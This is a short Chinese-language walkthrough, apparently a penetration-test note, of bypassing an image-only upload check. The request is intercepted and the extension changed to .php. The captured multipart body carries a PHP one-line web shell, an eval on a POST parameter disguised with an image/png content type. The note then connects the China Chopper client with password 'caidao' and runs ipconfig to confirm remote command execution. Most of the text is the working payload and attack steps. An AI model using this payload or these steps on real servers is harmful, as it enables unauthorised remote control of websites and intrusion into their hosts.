思路:
图片上传功能中,前端页面上传的是.png格式的图片文件,但是抓包Request中修改图片后缀为.php
可以绕过对上传文件格式的限制,文件的上传路径可以在上传后的页面或查看上传成功后的response中有显示,
记录下来后用菜刀连接即可。
(1)网站要求上传png格式的文件
(2)保存-抓包,将文件后缀.png删除,剩余.php文件继续提交,提示成功。
Content-Disposition: form-data; name="fun_menu_icon" test123*.php
-----------------------------
Content-Disposition: form-data; name="fun_menu_icon_upload"; filename="test123*.php"
Content-Type: image/png <?php @eval($_POST['caidao']); ?>
-----------------------------
Content-Disposition: form-data; name="fun_menu_img" test123*.php
-----------------------------
Content-Disposition: form-data; name="fun_menu_img_upload"; filename="test123*.php"
Content-Type: image/png <?php @eval($_POST['caidao']); ?>
(3)在原始数据提交页面或提交数据后response页面中查找上传路径并记录。
(4)打开最新版中国菜刀,添加已经记录的路径,添加密码caidao
(5)连接虚拟终端,输入ipconfig
木马成功上传并执行。